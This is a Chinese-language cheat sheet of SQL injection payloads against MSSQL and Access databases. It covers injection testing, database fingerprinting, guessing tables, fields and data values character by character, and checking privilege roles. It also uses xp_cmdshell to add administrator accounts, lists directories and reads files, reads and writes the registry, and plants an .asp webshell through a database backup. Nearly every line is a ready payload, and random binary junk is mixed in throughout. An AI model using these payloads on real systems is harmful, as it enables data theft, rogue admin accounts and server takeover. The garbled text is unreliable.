1.判断是否有注入;and 1=1 ;and 1=2 )`,3/i�9C$
2.初步判断是否是mssql ;and user>0 �|B�;:Ald
<�S�6|$7{1
3.注入参数是字符'and [查询条件] and ''=' �(�YGJw?]�
�|TkMr��j0
4.搜索时没过滤参数的'and [查询条件] and '%25'=' S)n����~^q
�X@\rg�}kP
5.判断数据库系统 x!tCK47�Yq
[w��jA8d�.
;and (select count(*) from sysobjects)>0 mssql r�ts@1JY�[
�s��0E:hn:
;and (select count(*) from msysobjects)>0 access {&4+W=0
n�
R%� l=NHB}
p3\F1]�(�Z
�e#0R9+"Ba
6.猜数据库 ;and (select Count(*) from [数据库名])>0 A>�b�o Xcr
UCa(3�p^V_
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 3!Gnc0%c��
bE�MD2�ABm
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �mPi4.p�)�
��R}#?A%,*
9.(1)猜字段的ascii值(access) 3(�}W=o�I�
E��/Q[J.$o
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 z$QYl*F��1
T��F�^�Rh4
(2)猜字段的ascii值(mssql) a^@6hC�>sr
MkR�RBv��k
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 u1~H1
]I�i
ss-{�l�+Z5
10.测试权限结构(mssql) >Te�T�a l�
V[(zRG�a�{
`$A�X!,<!G
H C�Z#7��Z
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Vge9A�H:op
��jRm�v~�]
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- MIsj���TKE
��q#x�o�M1
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �GASDkVoij
�$GSn#} yz
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ^Cst4=�:�W
VE��kv
JX.
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- quTM|>=�_R
&
VJ+�X|Z�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �[W�,�E��j
�i
?%;s5<�
;and 1=(select IS_MEMBER('db_owner'));-- d!�D#:l3;�
y�S0!�#�AG
X"z�^4?Aj+
K �pD�K�Ii
11.添加mssql和系统的帐户 MD�1n+FgTu
��L��09YA�
;exec master.dbo.sp_addlogin username;-- 5*/~) wN\U
;exec master.dbo.sp_password null,username,password;-- �>�OgA3)X�
F
�*=�>�=
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �7.,C'�^ci
k-Hy>�5�;
;exec master.dbo.xp_cmdshell 'net user username password ����Eh^c4x
-lQ8
�&e�B
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- t3}>5cAxy�
No�B�)tAvw
;exec master.dbo.xp_cmdshell 'net user username password /add';-- jL8.*pfv
a�z*c0Z<pl
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- D�{x'k�2=
�%c<�e`P;�
^":UkPFCx:
D|���9�x�D
12.(1)遍历目录 )[C�]1N=tK
FO<PMK����
;create table dirs(paths varchar(100), id int) �H��9?(5��
��6�ey{�+8
;insert dirs exec master.dbo.xp_dirtree 'c:\' b�}HL���uX
�)\s{\u
\�
;and (select top 1 paths from dirs)>0 C<� �3`�]l
g`i?]6c}jt
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ;.�Zgt8/�.
<wfPbz�s-V
��l+HmG< P
+�DmfqKKbd
(2)遍历目录 6!�s�����C
5�Ta��g�-+
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- v*iD)�k:|t
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 K|�%.mc�s4
y-6k�<R�N�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 *'H0%GM��
&b'IY�oe��
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �J~Uq'�1?�
97�l�<9^$�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 � Gf_�Je �
?��41�bZ$j
�|J-�Os�i�
e�S-ak�x^@
13.mssql中的存储过程 X
[IVK~D}z
.)59�*'�0
xp_regenumvalues 注册表根键, 子键 $�� @�g\wz
H�e vZ�}�.
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 a> qB
k}�)
��[U'I3x,�
xp_regread 根键,子键,键值名 �c|m*�<�
i
NX�o$rf��:
;exec xp_regread 4�z��KmoYt
�K~Nx;{{d�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 6l]jm�j�)/
�+�-~8�t�^
xp_regwrite 根键,子键, 值名, 值类型, 值 1[p6v4�qO{
Nk?eVJ)���
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �s��B`��.G
��e}>3<Dh�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ]�Y111�<Ja
H c�,e��&R
xp_regdeletevalue 根键,子键,值名 Gf7�1udaa�
Jx@_�OE_vp
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �f$1�&)1W[
[w�O��z<�<
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 u�aghB,i'n
#dj��by}hi
m&vuBb�3��
RwKnNIp��
14.mssql的backup创建webshell >vQ8�~*xd�
��.JC�d:'-
use model
[�GQn1ZLc
F�xU �a5�n
create table cmd(str image); Fi)(~j�i�:
RK�)1@Tz7!
insert into cmd(str) values (''); ��jKr\m��b
P^[eTR��*?
backup database model to disk='c:\l.asp'; �p�Lj[b4p9
o-I�:p$B�-
>|zMN$�:�
9Xl[AVs:M
15.mssql内置函数 sE^ee2]OI@
B��70�3{k
;and (select @@version)>0 获得Windows的版本号 sU Er?T�Z
&��_cH9zw@
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��HOt,G
_{
UOIB}ut
�V
;and (select user_name())>0 爆当前系统的连接用户 56w uk�
[)
W��{�A4*�{
;and (select db_name())>0 得到当前连接的数据库 J�4?i\wD:
L�s<^z�@I�
�\!�L�IqqX
/U�26IbJ��
16.简洁的webshell �)iX2r��{
U}T�{r%9��
use model �s!�<RWy�+
z@I'Ryalyc
create table cmd(str image); tNoPpI�u�
CiW�z>HWH
insert into cmd(str) values (''); S��^s�|/!>
d!�{]C�Z"@
backup database model to disk='g:\wwwtest\l.asp';
